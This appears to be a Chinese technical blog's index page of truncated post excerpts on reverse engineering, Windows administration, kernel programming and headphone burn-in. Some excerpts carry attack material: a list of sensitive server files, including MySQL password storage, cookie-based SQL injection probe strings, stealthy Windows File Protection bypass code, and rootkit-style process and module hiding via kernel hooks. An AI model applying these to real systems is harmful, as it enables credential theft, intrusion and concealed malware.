[Email] pliceman_110@163.com PS:本文如果有錯(cuò)漏請來信指出
[范圍] 逆向工程
[目的] 分享逆向技術(shù)心德
[目標(biāo)API] 未文檔化的RtlInitializeGenericTable
[參考文獻(xiàn)] Secrets of Reverse Engineering
..........
閱讀全文
摘要: /usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/php5/lib/php.ini //PHP相關(guān)設(shè)置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虛擬網(wǎng)站設(shè)置
/etc/my.cnf //mysql的配置文件
/etc/issue //系統(tǒng)版本
/etc/issue.net
/etc/redhat-release
C:\mysql\data\mysql\user.MYD //存儲(chǔ)了mysql.user表中的數(shù)據(jù)庫連接密碼
/etc/sysconfig/iptables //從中得到防火墻規(guī)則策略
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Serv-U\Serv 閱讀全文
摘要:
The problem: you use terminal services in administration mode (which allows 2 sessions), now you cannot connect to the server because all sessions are used.
Windows 2000+ (includes Windows XP and 2003) have two command-line tools called qwinsta and rwinsta that can query and reset a remote session.
Query a server:
> qwinsta /server:192.168.12.12
.......
閱讀全文
摘要:
I had to create a .VBS script to create an automated E-Mail message. The hardest part was to set the importance of the mail, I've found the solution here: http://www.lewisroberts.com/?p=64
Here come's the script:
Dim iMsg
Dim iConf
Dim Flds
Dim strHTML
............
閱讀全文
摘要:
Standard user's in big companies usually runs as unprivileged users, thus they cannot execute admin tasks. But sometimes it's necessary to run a task with admin rights (automated software deploy) - runas, in some situations, is a bad idea because it needs a user and a clear text password (and no, the password compiled in an exe file is not very safe!).
......
閱讀全文
摘要: Most new Servers or Workstations aren't equipped with a floppy drive anymore, but from time to time I need to boot from a floppy drive. And I don't want to burn a CD each time I need to boot from a floppy drive.. so the solution is tftpd32 and PXELINUX. With those 2 tools I'm able to boot disk images from the LAN.
You need tftpd32 from Ph. Jounin (http://tftpd32.jounin.net/) and PXELINUX, which is a part of the SYSLINUX package (http://syslinux.zytor.com).
閱讀全文
摘要:
#include <windows.h>
#include <gdiplus.h>
#include <stdio.h>
#pragma comment(lib,"gdiplus.lib")
using namespace Gdiplus;
INT GetEncoderClsid(const WCHAR* format, CLSID* pClsid); // helper function
...........
閱讀全文
摘要: Terminal Service: Connect and/or Shadow to a Console Session...
crosspost from http://blogs.msdn.com/rextang
Seems some of my friends still didn't know how to use Microsoft Terminal Service Client to connect to the console session of a windows pc (server or client OS) so here is a memo for it also during the search I found the other interesting thing that can let Terminal Service to function like a VNC server (2 users share the same session, called "shadow session" here).
..... 閱讀全文
摘要: 堡耳機(jī)的方法
一般來說,新買來的好點(diǎn)的耳機(jī)都需要堡,堡了以后才能有比較好的音質(zhì)。
堡耳機(jī)的步驟如下:
1.正常聽音量的1/3驅(qū)動(dòng)耳機(jī)24小時(shí)(100-10kHz)
2.正常聽音量的2/3驅(qū)動(dòng)耳機(jī)24小時(shí)(50-15kHz)
3.正常聽音量驅(qū)動(dòng)耳機(jī)72小時(shí)(20-20kHz)
4.正常聽音量的3/4驅(qū)動(dòng)耳機(jī)24小時(shí)(20-20K)
5.正常聽音量聽歌 閱讀全文
摘要: 進(jìn)程隱藏的兩種方法
這兩種都是很古老的方法,因?yàn)闊o聊,所以寫了一下。代碼在XP_SP2下調(diào)試通過.
(1).從活動(dòng)進(jìn)程鏈表(ActiveProcessLinks)中摘除自身,這種方法可以欺騙任務(wù)管理器,
下面這個(gè)程序做的就是雙向鏈表的刪除節(jié)點(diǎn)和插入節(jié)點(diǎn),十分的簡單。
(2).如果你反匯編taskmgr.exe,可以在發(fā)現(xiàn)taskmgr.exe是通過NtQuerySystemInformation枚舉進(jìn)程的,
因此可以通過掛鉤系統(tǒng)服務(wù)NtQuerySystemInformation修改這個(gè)函數(shù)的行為,從而實(shí)現(xiàn)在任務(wù)管理器中隱藏進(jìn)程的目的,下面就是實(shí)現(xiàn)代碼。
...........
閱讀全文
摘要: .386
.model flat, stdcall
option casemap:none
;**************************************************************************************************
include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\ntoskrnl.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac
;**************************************************************************************************
閱讀全文
摘要: Set wmiServices = GetObject("winmgmts:root/default")
Set wmiSink = WScript.CreateObject("WbemScripting.SWbemSink", "SINK_")
wmiServices.ExecNotificationQueryAsync wmiSink, _
"SELECT * FROM RegistryKeyChangeEvent WHERE Hive='HKEY_LOCAL_MACHINE' AND " & _
"KeyPath='SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'"
WScript.Echo "Listening..." & vbCrLf
While(1)
WScript.Sleep 1000
Wend
Sub SINK_OnObjectReady(wmiObject, wmiAsyncContext)
WScript.Echo "R 閱讀全文
摘要: 例:
http://xxxx/view.asp?id=1
先訪問http://xxxx/view.asp?id=1
接著在瀏覽器里輸入:
javascript:alert(document.cookie="id="+escape("1 and 1=1"))
再訪問http://xxxx/view.asp(未出錯(cuò))
再輸入:javascript:alert(document.cookie="id="+escape("188 and 1=2"))
再訪問:http://xxxx/view.asp(出錯(cuò))
該頁面出錯(cuò)就表示可以用Cookie注入。
..........
閱讀全文
摘要: #include <stdio.h>
#include <windows.h>
typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);
void Disable_WFP()
{
HINSTANCE hmod=LoadLibrary("sfc_os.dll");
CPP SetSfcFileException;
// the function is stored at the fifth ordinal in sfc_os.dll
SetSfcFileException= (CPP)GetProcAddress(hmod,(LPCSTR)5);
SetSfcFileException(0, L"c:\\windows\\system32\\calc.exe",-1);
//Now we can modify the system file in a complete stealth. 閱讀全文
摘要: 有時(shí)候我們希望能夠動(dòng)態(tài)監(jiān)視系統(tǒng)中任意進(jìn)程/線程的創(chuàng)建與銷毀。為了達(dá)
到此目的我翻閱了 DDK 手冊,發(fā)現(xiàn)其提供的 PsSetCreateProcessNotifyRoutine(),
PsSetCreateThreadNotifyRoutine(),等函數(shù)可以實(shí)現(xiàn)此功能。這兩個(gè)函數(shù)可以
通過向系統(tǒng)注冊一個(gè) CALLBALCK 函數(shù)來監(jiān)視進(jìn)程/線程等操作。函數(shù)原形如下:
NTSTATUS
PsSetCreateProcessNotifyRoutine(
IN PCREATE_PROCESS_NOTIFY_ROUTINE NotifyRoutine,
IN BOOLEAN Remove
);
......................
閱讀全文
摘要: 1,SSDT
SSDT即系統(tǒng)服務(wù)描述符表,它的結(jié)構(gòu)如下(參考《Undocument Windows 2000 Secretes》第二章):
typedef struct _SYSTEM_SERVICE_TABLE
{
PVOID ServiceTableBase; //這個(gè)指向系統(tǒng)服務(wù)函數(shù)地址表
PULONG ServiceCounterTableBase;
ULONG NumberOfService; //服務(wù)函數(shù)的個(gè)數(shù),NumberOfService*4 就是整個(gè)地址表的大小
ULONG ParamTableBase;
}SYSTEM_SERVICE_TABLE,*PSYSTEM_SERVICE_TABLE;
.........
閱讀全文
摘要:
通過對(duì) NtReadVirtualMemory 掛鉤,防止其他進(jìn)程對(duì)保護(hù)的模塊進(jìn)行掃描,
如果發(fā)現(xiàn)其他進(jìn)程讀被保護(hù)模塊的內(nèi)存,則返回0
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
.........
閱讀全文
|
|
公告
常用鏈接
留言簿(113)
隨筆分類
隨筆檔案
文章分類
相冊
Link
搜索
最新評(píng)論

閱讀排行榜
評(píng)論排行榜
|
|